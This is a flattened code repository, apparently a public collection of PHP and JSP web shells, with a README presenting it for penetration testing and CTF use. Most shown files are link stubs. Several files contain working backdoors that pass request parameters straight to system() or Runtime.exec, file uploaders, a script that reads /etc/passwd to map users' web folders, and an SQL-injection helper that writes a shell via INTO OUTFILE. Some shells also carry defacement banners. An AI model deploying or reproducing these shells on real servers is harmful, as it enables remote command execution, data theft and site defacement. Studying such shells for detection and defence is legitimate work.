├── .gitmodules ├── Collection ├── 529.php ├── NGH.php ├── cw.php ├── erne.php ├── kral.php ├── AK-74.php ├── PHVayv.php ├── PhpSpy.php ├── fatal.php ├── nshell.php ├── stres.php ├── tryag.php ├── zehir4.php ├── CasuS-1.5.php ├── MyShell.php ├── PHANTASMA.php ├── cgitelnet.php ├── ex0shell.php ├── rootshell.php ├── s72_Shell.php ├── safe0ver.php ├── sosyete.php ├── Sincap_1.0.php ├── accept_language.php ├── cybershell.php ├── load_shell.php ├── Ayyildiz_Tim.php ├── CrystalShell.php ├── GFS_web-shell.php ├── NTDaddy_v1.9.php ├── PHPRemoteView.php ├── Safe0ver_Shell.php ├── aZRaiLPhp_v1.0.php ├── toolaspshell.php ├── JspWebshell_1.2.php ├── KA_uShell_0.1.6.php ├── Loaderz_WEB_Shell.php ├── cmd.php ├── robots.php ├── ZyklonShell.php ├── Uploader.php ├── simple-backdoor.php ├── simple_cmd.php ├── Simple_PHP_backdoor.php ├── easy-simple-php-webshell.php ├── Non-alphanumeric.php ├── ru24_post_sh.php ├── jspshell.jsp ├── pws.php ├── pHpINJ.php ├── php-web-shell.php ├── Simple-Webshell.php ├── go-shell.php ├── h4ntu_shell.php ├── Worse_Linux_Shell.php ├── NCC-Shell.php ├── lamashell.php ├── php-backdoor.php ├── ftpsearch.php ├── php-findsock-shell.php ├── matamu.php ├── WinX_Shell.php ├── Safe_Mode_Bypass.php ├── SimShell.php ├── Dive_Shell.php ├── php-reverse-shell.php ├── hiddens_shell.php ├── backupsql.php ├── STNC_WebShell_v0.8.php ├── Moroccan_Spamers.php ├── wwwolf-webshell.php ├── configkillerionkros.php ├── spygrup.php ├── cpanel.php ├── mini.php ├── Rootshell.v.1.0.php ├── SimAttacker.php ├── c0derz_shell.php ├── Antichat_Shell.php └── lolipop.php └── README.md /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "b374k"] 2 | path = b374k 3 | url = https://github.com/b374k/b374k 4 | -------------------------------------------------------------------------------- /Collection/529.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/529.php -------------------------------------------------------------------------------- /Collection/NGH.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/NGH.php -------------------------------------------------------------------------------- /Collection/cw.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/cw.php -------------------------------------------------------------------------------- /Collection/erne.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/erne.php -------------------------------------------------------------------------------- /Collection/kral.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/kral.php -------------------------------------------------------------------------------- /Collection/AK-74.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/AK-74.php -------------------------------------------------------------------------------- /Collection/PHVayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/PHVayv.php -------------------------------------------------------------------------------- /Collection/PhpSpy.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/PhpSpy.php -------------------------------------------------------------------------------- /Collection/fatal.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/fatal.php -------------------------------------------------------------------------------- /Collection/nshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/nshell.php -------------------------------------------------------------------------------- /Collection/stres.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/stres.php -------------------------------------------------------------------------------- /Collection/tryag.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/tryag.php -------------------------------------------------------------------------------- /Collection/zehir4.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/zehir4.php -------------------------------------------------------------------------------- /Collection/CasuS-1.5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/CasuS-1.5.php -------------------------------------------------------------------------------- /Collection/MyShell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/MyShell.php -------------------------------------------------------------------------------- /Collection/PHANTASMA.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/PHANTASMA.php -------------------------------------------------------------------------------- /Collection/cgitelnet.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/cgitelnet.php -------------------------------------------------------------------------------- /Collection/ex0shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/ex0shell.php -------------------------------------------------------------------------------- /Collection/rootshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/rootshell.php -------------------------------------------------------------------------------- /Collection/s72_Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/s72_Shell.php -------------------------------------------------------------------------------- /Collection/safe0ver.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/safe0ver.php -------------------------------------------------------------------------------- /Collection/sosyete.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/sosyete.php -------------------------------------------------------------------------------- /Collection/Sincap_1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/Sincap_1.0.php -------------------------------------------------------------------------------- /Collection/accept_language.php: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /Collection/cybershell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/cybershell.php -------------------------------------------------------------------------------- /Collection/load_shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/load_shell.php -------------------------------------------------------------------------------- /Collection/Ayyildiz_Tim.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/Ayyildiz_Tim.php -------------------------------------------------------------------------------- /Collection/CrystalShell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/CrystalShell.php -------------------------------------------------------------------------------- /Collection/GFS_web-shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/GFS_web-shell.php -------------------------------------------------------------------------------- /Collection/NTDaddy_v1.9.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/NTDaddy_v1.9.php -------------------------------------------------------------------------------- /Collection/PHPRemoteView.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/PHPRemoteView.php -------------------------------------------------------------------------------- /Collection/Safe0ver_Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/Safe0ver_Shell.php -------------------------------------------------------------------------------- /Collection/aZRaiLPhp_v1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/aZRaiLPhp_v1.0.php -------------------------------------------------------------------------------- /Collection/toolaspshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/toolaspshell.php -------------------------------------------------------------------------------- /Collection/JspWebshell_1.2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/JspWebshell_1.2.php -------------------------------------------------------------------------------- /Collection/KA_uShell_0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/KA_uShell_0.1.6.php -------------------------------------------------------------------------------- /Collection/Loaderz_WEB_Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/HEAD/Collection/Loaderz_WEB_Shell.php -------------------------------------------------------------------------------- /Collection/cmd.php: -------------------------------------------------------------------------------- 1 | "; 4 | $cmd = ($_REQUEST['cmd']); 5 | system($cmd); 6 | echo ""; 7 | die; 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /Collection/robots.php: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Allow: /#Begin Attracta SEO Tools Sitemap. Do not remove 3 | sitemap: http://cdn.attracta.com/sitemap/2519186.xml.gz 4 | #End Attracta SEO Tools Sitemap. Do not remove 5 | -------------------------------------------------------------------------------- /Collection/ZyklonShell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 |

Not Found

6 | The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.

7 | 8 | -------------------------------------------------------------------------------- /Collection/Uploader.php: -------------------------------------------------------------------------------- 1 |

2 | 3 | Send this file: 4 | 5 |
6 | 9 | 10 | -------------------------------------------------------------------------------- /Collection/simple-backdoor.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /Collection/simple_cmd.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
8 |
9 | 11 |
12 | 
13 | 
14 | 
15 |
16 |
17 | 18 | 3 | 4 | "; 8 | $cmd = ($_REQUEST['cmd']); 9 | system($cmd); 10 | echo ""; 11 | die; 12 | } 13 | 14 | ?> 15 | 16 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Collection/easy-simple-php-webshell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 |
7 | 
 8 | 
14 |
15 | 16 | 17 | -------------------------------------------------------------------------------- /Collection/Non-alphanumeric.php: -------------------------------------------------------------------------------- 1 | >$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_; 4 | $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; 5 | $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); 6 | $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); 7 | $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; 8 | $_=$ 9 | $_[$__+ $__] ;$_[@-_]($_[@!+_] ); 10 | 11 | ?> -------------------------------------------------------------------------------- /Collection/ru24_post_sh.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo "
"; 16 | echo ""; 17 | echo "
"; 18 | echo "
";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
"; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /Collection/jspshell.jsp: -------------------------------------------------------------------------------- 1 | <%@ page 2 | import="java.util.*,java.io.*"%> 3 | <% 4 | %> 5 | 6 | 7 |

JSP SHELL

8 |
10 | 11 | 12 |
13 | 
14 | <%
15 | if (request.getParameter("cmd") != null) {
16 | out.println("Command: " +
17 | request.getParameter("cmd") + "
");
18 | Process p =
19 | Runtime.getRuntime().exec(request.getParameter("cmd"));
20 | OutputStream os = p.getOutputStream();
21 | InputStream in = p.getInputStream();
22 | DataInputStream dis = new DataInputStream(in);
23 | String disr = dis.readLine();
24 | while ( disr != null ) {
25 | out.println(disr);
26 | disr = dis.readLine();
27 | }
28 | }
29 | %>
30 |
31 | 32 | 33 | -------------------------------------------------------------------------------- /Collection/pws.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |
Input command :
4 |
5 |
6 | 
 7 | 
13 |
14 |
15 |
Uploader file :
16 | 17 | 27 | 28 | "> 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /Collection/pHpINJ.php: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | || .::News Remote PHP Shell Injection::. || 6 | 7 | 8 |
|| .::News PHP Shell Injection::. ||


9 | ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; 15 | $sql = urlencode($sql); 16 | $expurl= $url."?id=".$sql ; 17 | echo ' Click Here to Exploit
'; 18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; 19 | } 20 | else 21 | { 22 | ?> 23 | Url to index.php:
24 | " method = "post"> 25 |
26 | Server Path to Shell:
27 | Full server path to a writable file which will contain the Php Shell
28 |

29 |

30 | 31 | 32 | 33 | 36 | 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Contributing 2 | ============ 3 | 4 | To contribute other shells not listed here... Fork, Push the changes to your repo, then before you request for a Pull, make sure to include a simple description of your **php** web-shell and include a screen-shot of the web-shell (as hosted in your localhost). 5 | 6 | PHP Webshells 7 | ============= 8 | 9 | Common PHP shells is a collection of PHP webshells that you may need for your penetration testing (PT) cases or in a CTF challenge. 10 | 11 | Do not host any of the files on a publicly-accessible webserver (unless you know what you are up-to). 12 | 13 | These are provided for education purposes only and legitimate PT cases. 14 | 15 | I'll keep updating the collection whnever I stumble on any new webshell. 16 | 17 | FYI 18 | ==== 19 | 20 | 21 | For basic features, I recommend one-liners like : 22 | 23 | `` 24 | 25 | `` 26 | 27 | `` 28 | 29 | `` 30 | 31 | 32 | Cite: 33 | ===== 34 | 35 | ``` 36 | @software{jacques_pharand_2020_3748072, 37 | author = {Jacques Pharand and 38 | John Troon and 39 | Javier Izquierdo Vera}, 40 | title = {JohnTroony/php-webshells: Collection CS1}, 41 | month = apr, 42 | year = 2020, 43 | publisher = {Zenodo}, 44 | version = {1.1}, 45 | doi = {10.5281/zenodo.3748072}, 46 | url = {https://doi.org/10.5281/zenodo.3748072} 47 | } 48 | 49 | ``` 50 | -------------------------------------------------------------------------------- /Collection/php-web-shell.php: -------------------------------------------------------------------------------- 1 | PHP Web Shell 2 | 3 | 4 | 5 | 13 | 14 | 15 | 16 | Command 17 | 18 |
19 | 20 | 21 | Executed: $decoded_command"; 24 | echo str_repeat("
",2); 25 | echo "Output:"; 26 | echo str_repeat("
",2); 27 | exec($decoded_command . " 2>&1", $output, $return_status); 28 | if (isset($return_status)): 29 | if ($return_status !== 0): 30 | echo "Error in Code Execution --> "; 31 | foreach ($output as &$line) { 32 | echo "$line
"; 33 | }; 34 | elseif ($return_status == 0 && empty($output)): 35 | echo "Command ran successfully, but does not have any output."; 36 | else: 37 | foreach ($output as &$line) { 38 | echo "$line
"; 39 | }; 40 | endif; 41 | endif; 42 | ?> 43 | 44 | 45 | -------------------------------------------------------------------------------- /Collection/Simple-Webshell.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | Web Shell 20 | 21 | 38 | 39 | 40 | 41 | 42 | 43 |
44 | 45 |
46 |

PHP Shell

47 |

Execute a command

48 |
49 | 50 |
51 |
52 | 53 | 54 |
55 | 56 |
57 | 58 | 59 |
60 |

Output

61 |
62 | 
63 | 
64 |
65 | 66 |
67 |

Output

68 |
69 | 
No result.
70 | 71 |
72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /Collection/go-shell.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | #change this password; for power security - delete this file =) 4 | $pwd='adm'; 5 | 6 | print "Content-type: text/html\n\n"; 7 | &read_param(); 8 | if (!defined$param{dir}){$param{dir}="/"}; 9 | if (!defined$param{cmd}){$param{cmd}="ls -la"}; 10 | if (!defined$param{pwd}){$param{pwd}='ter'}; 11 | 12 | print << "[kalabanga]"; 13 | 14 | GO.cgi 15 | 38 | 39 | 40 | Current request is: 41 |
42 | [kalabanga] 43 | 44 | print "cd $param{dir}&&$param{cmd}"; 45 | 46 | print << "[kalabanga]"; 47 |
48 | Answer for current request is: 49 | 
50 | [kalabanga]
51 | 
52 | if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
53 | else {
54 | open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
55 | while ($line=){print "$line";};
56 | close (FILEHANDLE);
57 | };
58 | 
59 | print << "[kalabanga]";
60 |
61 |
62 | Password: 63 | 64 | Dir for next request: 65 | 66 | next request: 67 | 68 | 69 | 70 |
71 | 72 | 73 | [kalabanga] 74 | 75 | sub read_param { 76 | $buffer = "$ENV{'QUERY_STRING'}"; 77 | @pairs = split(/&/, $buffer); 78 | foreach $pair (@pairs) 79 | { 80 | ($name, $value) = split(/=/, $pair); 81 | $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; 82 | $value =~ s/\+/ /g; 83 | $value =~ s/%20/ /g; 84 | $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; 85 | $param{$name} = $value; 86 | } 87 | } -------------------------------------------------------------------------------- /Collection/h4ntu_shell.php: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

"; 4 | ?> 5 | 6 | 16 | 17 |
18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
:
User Info: uid=() euid=() gid=()
Current Path:
Permission Directory:
Server Services:
Server Adress:
Script Current User:
PHP Version:
55 |
56 | 57 | #php injection:
58 |
"> 59 | cmd : 60 | 61 |
62 | 63 |
64 | 65 |
66 | 67 | 
68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
76 | exit;
77 | ?>
78 |
79 | -------------------------------------------------------------------------------- /Collection/Worse_Linux_Shell.php: -------------------------------------------------------------------------------- 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}"; 6 | print "

#worst @dal.net

"; 7 | print "

You have been hack By Shany with Love To #worst.

"; 8 | print "

Watch Your system Shany was here.

"; 9 | print "

Linux Shells

"; 10 | print "
"; 11 | 12 | $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); 13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); 14 | 15 | $UName = `uname -a`; 16 | $SCWD = `pwd`; 17 | $UserID = `id`; 18 | 19 | if( $currentWD == "" ) { 20 | $currentWD = $SCWD; 21 | } 22 | 23 | print ""; 24 | print ""; 25 | print ""; 26 | print ""; 27 | print ""; 28 | print "
We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
Server is:".$_SERVER['SERVER_SIGNATURE']."
System type:$UName
Our permissions:$UserID
"; 29 | 30 | print "
"; 31 | 32 | if( $_POST['_act'] == "List files!" ) { 33 | $currentCMD = "ls -la"; 34 | } 35 | 36 | print "
"; 37 | 38 | print ""; 39 | print ""; 40 | 41 | print ""; 42 | print ""; 43 | 44 | print ""; 45 | print ""; 46 | 47 | print "
Execute command:
Change directory:
Upload file:
"; 48 | 49 | $currentCMD = str_replace("\\\"","\"",$currentCMD); 50 | $currentCMD = str_replace("\\\'","\'",$currentCMD); 51 | 52 | if( $_POST['_act'] == "Upload!" ) { 53 | if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { 54 | print "
Error while uploading file!
"; 55 | } else { 56 | print "
";
57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
58 |         print "
File uploaded successfully!
"; 59 | } 60 | } else { 61 | print "\n\n\n
\n";
62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
63 |     system($currentCMD);
64 |     print "\n
\n\n\n
Command completed
"; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /Collection/NCC-Shell.php: -------------------------------------------------------------------------------- 1 |
2 |

.:NCC:. Shell v1.0.0

3 | .:NCC:. Shell v1.0.0 4 |

Hacked by Silver

5 |

---------------------------------------------------------------------------------------


6 | ---Server Info---
7 | Safe Mode on/off: "; 9 | // Check for safe mode 10 | if( ini_get('safe_mode') ) { 11 | print 'Safe Mode ON'; 12 | } else { 13 | print 'Safe Mode OFF'; 14 | } 15 | echo "
"; 16 | echo "Momentane Directory: "; echo $_SERVER['DOCUMENT_ROOT']; 17 | echo "
"; 18 | echo "Server:
"; echo $_SERVER['SERVER_SIGNATURE']; 19 | echo "PHPinfo"; 20 | if(@$_GET['p']=="info"){ 21 | @phpinfo(); 22 | exit;} 23 | ?> 24 |

---------------------------------------------------------------------------


25 |

- Upload -

26 | Upload - Shell/Datei 27 |
31 | 32 | 33 |
34 |
35 | \n", 41 | $_FILES['probe']['name']); 42 | printf("Sie ist %u Bytes groß und vom Typ %s.
\n", 43 | $_FILES['probe']['size'], $_FILES['probe']['type']); 44 | } 45 | ?> 46 |

---------------------------------------------------------------------------


47 |

IpLogger

48 |
IP: "; echo $_SERVER['REMOTE_ADDR']; 50 | echo "
PORT: "; echo $_SERVER['REMOTE_PORT']; 51 | echo "
BROWSER: "; echo $_SERVER[HTTP_REFERER]; 52 | echo "
REFERER: "; echo $_SERVER['HTTP_USER_AGENT']; 53 | ?> 54 |

---------------------------------------------------------------------------


55 |

Directory Lister

56 |

>

57 |

---------------------------------------------------------------------------


58 | --Coded by Silver©--
59 | ~|_Team .:National Cracker Crew:._|~
60 | -->NCC<--
61 | -------------------------------------------------------------------------------- /Collection/lamashell.php: -------------------------------------------------------------------------------- 1 | 18 | 20 | 21 | 22 | lama's'hell v. 3.0 23 | 30 | 31 | 32 | 
33 |                               _           _
34 |                              / \_______ /|_\
35 |                             /          /_/ \__
36 |                            /             \_/ /
37 |                          _|_              |/|_
38 |                          _|_  O    _    O  _|_
39 |                          _|_      (_)      _|_
40 |                           \                 /
41 |                            _\_____________/_
42 |                           /  \/  (___)  \/  \
43 |                           \__(  o     o  )__/ 
58 |
59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
Execute command:
Change directory:
Upload file:
67 | 

68 | 
";
72 |     } else {
73 |         echo "There was an error uploading the file, please try again!";
74 |     }
75 |     }
76 |     if(($_POST['exe']) == "Execute") {
77 |      $curcmd = "cd ".$curdir.";".$curcmd;
78 |      $f=popen($curcmd,"r");
79 |      while (!feof($f)) {
80 |       $buffer = fgets($f, 4096);
81 |       $string .= $buffer;
82 |      }
83 |      pclose($f);
84 |      echo htmlspecialchars($string);
85 |     }
86 | ?>
87 |
88 | 89 | 90 | -------------------------------------------------------------------------------- /Collection/php-backdoor.php: -------------------------------------------------------------------------------- 1 | "; 14 | if ($handle = opendir("$d")) { 15 | echo "

listing of $d

"; 16 | while ($dir = readdir($handle)){ 17 | if (is_dir("$d/$dir")) echo ""; 18 | else echo ""; 19 | echo "$dir\n"; 20 | echo ""; 21 | } 22 | 23 | } else echo "opendir() failed"; 24 | closedir($handle); 25 | die ("
"); 26 | } 27 | if(isset($_REQUEST['c'])){ 28 | echo "
";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "
query was executed correctly
\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | 
execute command: 
 
58 | 

59 | upload file:   to dir:   

60 | 
to browse go to http://?d=[directory here]
61 | 
for example:
62 | http://?d=/etc on *nix
63 | or http://?d=c:/windows on win
64 | 
execute mysql query:
65 | 

66 | host:  user:  password: 
67 | 
68 | database:   query:  
69 | 

70 | 
71 | 
72 | 


--------------------------------------------------------------------------------
/Collection/ftpsearch.php:
--------------------------------------------------------------------------------
  1 | ";
  3 | echo "Edited By KingDefacer";
  4 | 
  5 | set_time_limit(0);
  6 | ##################
  7 | @$passwd=fopen('/etc/passwd','r');
  8 | if (!$passwd) {
  9 |   echo "[-] Error : coudn't read /etc/passwd";
 10 |   exit;
 11 | }
 12 | $path_to_public=array();
 13 | $users=array();
 14 | $pathtoconf=array();
 15 | $i=0;
 16 | 
 17 | while(!feof($passwd)) {
 18 | $str=fgets($passwd);
 19 | if ($i>35) {
 20 |    $pos=strpos($str,":");
 21 |    $username=substr($str,0,$pos);
 22 |    $dirz="/home/$username/public_html/";
 23 |    if (($username!="")) {
 24 |        if (is_readable($dirz)) {
 25 |            array_push($users,$username);
 26 |            array_push($path_to_public,$dirz);
 27 |        }
 28 |    }
 29 | }
 30 | $i++;
 31 | }
 32 | ###################
 33 | 
 34 | #########################
 35 | echo "

";
 36 | echo "
";
100 | 
101 | echo "";
102 | ?>
103 | 


--------------------------------------------------------------------------------
/Collection/php-findsock-shell.php:
--------------------------------------------------------------------------------
 1 | 
89 | 
90 | 


--------------------------------------------------------------------------------
/Collection/matamu.php:
--------------------------------------------------------------------------------
  1 | 
  6 | 
  7 | 
  8 | 
  9 |  Matamu Mat 
 10 | 
 11 | 
 12 | 


 13 | 
 14 | 
 56 | 
 57 | 

 58 | 
Current working directory: 
 59 | Root/';
 64 | 
 65 | if (!empty($work_dir_splitted[0])) {
 66 |   $path = '';
 67 |   for ($i = 0; $i < count($work_dir_splitted); $i++) {
 68 |     $path .= '/' . $work_dir_splitted[$i];
 69 |     printf('%s/',
 70 |            $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
 71 |   }
 72 | }
 73 | 
 74 | ?>

 75 | 
Choose new working directory:
 76 | 

115 | 
116 | 
Command: 
117 | 

118 | 
119 | 
Enable stderr-trapping? 

120 | 
137 | 

138 | 
139 | 
142 | 
143 | 

144 | 
145 | 
146 | 
147 | 


--------------------------------------------------------------------------------
/Collection/WinX_Shell.php:
--------------------------------------------------------------------------------
  1 | -:[GreenwooD]:- WinX Shell
  2 | 
  3 | ";
 32 | print    "";
 33 | print      "You:" ;
 34 | print      " ".$_SERVER['REMOTE_ADDR']." [".$host."] " ;
 35 | print    "";
 36 | print    "";
 37 | print      "Version OS:" ;
 38 | print      " $veros ";
 39 | print    "";
 40 | print    "";
 41 | print     "Server:";
 42 | print      "".$_SERVER['SERVER_SIGNATURE']."";
 43 | print    "";
 44 | print    "";
 45 | print     "Win Dir:";
 46 | print      " $windir ";
 47 | print    "";
 48 | print  "";
 49 | print  "
";
 50 | 
 51 | //------- [netstat -an] and [ipconfig] and [tasklist] ------------
 52 | print "
";
 53 | print "";
 54 | print "   ";
 55 | print "";
 56 | print "   ";
 57 | print "";
 58 | print "
";
 59 | //-------------------------------
 60 | 
 61 | 
 62 | //-------------------------------
 63 | 
 64 | print "";
 67 | print "
";
 68 | 
 69 | //-------------------------------
 70 | 
 71 | print "
";
 72 | print "CMD: ";
 73 | print "
";
 74 | print "";
 75 | print " ";
 76 | print "
";
 77 | 
 78 | //-------------------------------
 79 | 
 80 | print "
";
 81 | print "Upload:";
 82 | print "
";
 83 | print "";
 84 | print "File: ";
 85 | print " Filename on server:  ";
 86 | print" ";
 87 | print"
";
 88 | 
 89 | ?>
 90 | 
 91 | 
 92 | 
100 | 
101 | 
102 | 
Created by -:[GreenwooD]:- 

103 | 


--------------------------------------------------------------------------------
/Collection/Safe_Mode_Bypass.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
!Safe 
 6 | Mode Shell v1.0!

 7 | 

 8 | 	

 9 | 	

10 | 

11 | 	

12 | 		
 

18 | 	

19 | 
20 | 
21 | 
25 | */
26 | 
27 | echo "Safe Mode Shell"; 
28 | 
29 | 
30 | 
31 | 
32 | $tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
33 | 
34 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
35 | {
36 |  $safemode = true;
37 |  $hsafemode = "ON (secure)";
38 | }
39 | else {$safemode = false; $hsafemode = "OFF (not secure)";}
40 | echo("Safe-mode: $hsafemode");
41 | $v = @ini_get("open_basedir");
42 | if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
43 | else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
44 | echo("
");
